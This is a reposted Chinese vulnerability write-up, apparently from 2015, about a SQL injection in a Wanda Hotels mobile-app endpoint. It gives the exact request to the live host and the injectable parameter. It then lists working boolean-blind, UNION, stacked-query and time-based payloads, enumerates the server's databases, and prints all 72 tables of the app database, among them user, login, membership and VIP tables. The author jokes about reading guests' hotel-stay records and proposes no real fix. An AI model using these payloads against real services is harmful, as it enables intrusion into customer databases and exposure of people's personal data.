当前位置: 爱尖刀 > 首页安全 > 技术文章 > 正文

万达酒店(wanda_hotal)某APP/SQL注入一枚影响会员数据用户数据

2015-12-26 04:58 浏览次数:6539 我来说两句(0)

我是不是有点标题党的感觉,好吧,我承认了

1,万恶的程序猿们,不注意安全,我去找王思聪了

注入点:

POST http://app.wandahotels.com/hotelprocess/membership/getMembershipList.action HTTP/1.1

Content-Length: 6

Content-Type: application/x-www-form-urlencoded

Host: app.wandahotels.com

Connection: Keep-Alive

User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

code=1



2,注射点就是这个code

Parameter: code

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: code=1 AND 3632=3632

Type: UNION query

Title: Generic UNION query (NULL) - 14 columns

Payload: code=1 UNION ALL SELECT NULL, CHAR(58)+CHAR(120)+CHAR(118)+CHAR(110)+CHAR(58)+CHAR(70)+CHAR(70)+CHAR(99)+CHAR(116)+CHAR(119)+CHAR(104)+CHAR(81)+CHAR(67)+CHAR(121)+CHAR(74)+CHAR(58)+CHAR(114)+CHAR(115)+CHAR(104)+CHAR(58), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--

Type: stacked queries

Title: Microsoft SQL Server/Sybase stacked queries

Payload: code=1; WAITFOR DELAY '0:0:5';--



Type: AND/OR time-based blind

Title: Microsoft SQL Server/Sybase time-based blind

Payload: code=1 WAITFOR DELAY '0:0:5'--

---

available databases [7]:

[*] master

[*] model

[*] msdb

[*] ReportServer

[*] ReportServerTempDB

[*] tempdb

[*] wyhappdb



3,wyhappdb库的表挺多挺重要

Database: wyhappdb

[72 tables]

+-------------------------------+

| dbo.code_couponType |

| dbo.code_opera |

| dbo.code_purview |

| dbo.code_resource |

| dbo.complaint |

| dbo.coupon |

| dbo.department |

| dbo.group_hot |

| dbo.group_locate |

| dbo.group_story |

| dbo.hotel |

| dbo.hotelGrade |

| dbo.hotel_facility |

| dbo.hotel_facility_desc |

| dbo.hotel_facility_type |

| dbo.hotel_image |

| dbo.hotels_group |

| dbo.index_image |

| dbo.login_info |

| dbo.menus |

| dbo.menus_resources |

| dbo.position |

| dbo.resources |

| dbo.roomTypeUpgrade |

| dbo.roomType_point |

| dbo.sysdiagrams |

| dbo.user |

| dbo.wd_about |

| dbo.wd_clause |

| dbo.wd_coupon |

| dbo.wd_coupon_count |

| dbo.wd_exchange_his |

| dbo.wd_feedback |

| dbo.wd_point_rules |

| dbo.wd_version |

| dbo.wh_about |

| dbo.wh_city |

| dbo.wh_clause |

| dbo.wh_complaint |

| dbo.wh_cooking |

| dbo.wh_coupon |

| dbo.wh_cuisine |

| dbo.wh_dish |

| dbo.wh_feedback |

| dbo.wh_group |

| dbo.wh_group_hot |

| dbo.wh_group_locate |

| dbo.wh_group_story |

| dbo.wh_hotel |

| dbo.wh_hotel_facility |

| dbo.wh_hotel_facility_desc |

| dbo.wh_hotel_facility_type |

| dbo.wh_hotel_image |

| dbo.wh_hotel_restaurant_group |

| dbo.wh_hotel_specialty_group |

| dbo.wh_hotels_group |

| dbo.wh_index_image |

| dbo.wh_jobs |

| dbo.wh_login_info |

| dbo.wh_membership |

| dbo.wh_menus |

| dbo.wh_menus_resources |

| dbo.wh_news |

| dbo.wh_newtype |

| dbo.wh_periodical |

| dbo.wh_privilege |

| dbo.wh_privilege_hotel_group |

| dbo.wh_resources |

| dbo.wh_restaurant_group |

| dbo.wh_specialty |

| dbo.wh_version |

| dbo.wh_vip |

+-------------------------------+

4,user表和vip会不会有王思聪呢?

那张表是开房记录,我就不找了,怕扎我去喝咖啡

修复方案:

20 rank可好?


来源:红黑联盟

[广告]赞助链接:

知安,互联网产品安全医院:http://www.knowsafe.com
舆情监测,互联网舆情首选查舆情:http://www.chayuqing.com/
爱尖刀科技,关注企业数据与安全:http://www.ijiandao.com

关注公众号:Mcbang_com 了解更多精彩,关注:chayuqing_com 娱乐资讯早知道!
收藏 分享 发布者: admin |
看完这篇文章,你的感受如何?


伤心


无视


惊讶


流汗


赞同


路过
热点聚焦
更多>>
情凝中秋,乐在团圆 中秋节又称团圆节,是从古代至今,对远方亲人思念之情的体现;也是东方 ... [详细]
传递爱心 帮助需要的人 中国红十字已不能信任,民政系统变的自私,在这样的环境下,很多需 ... [详细]
【D盾】- 携手啊D共推《 [详细]
父亲节(Father's D 温家宝:父爱,如大海般深沉而宽广。 我们的力量出自与父亲,我们的 ... [详细]
祝高考学子凯旋而归 明后两天,高中三年的最后两天,也是将会影响命运的两天! 3年=1095天 ... [详细]

Archiver|网络尖刀 ( 京ICP备14006288号-3 )  

GMT+8, 2017-4-24 17:25 , Processed in 0.202745 second(s), 20 queries , Gzip On.

请勿发布违反中华人民共和国法律法规的言论
郑重声明:本站会员观点不代表【网络尖刀】论坛官方立场。

Copyright© 2006-2016 IjianDao.Com All rights reserved. 网络尖刀 版权所有

回顶部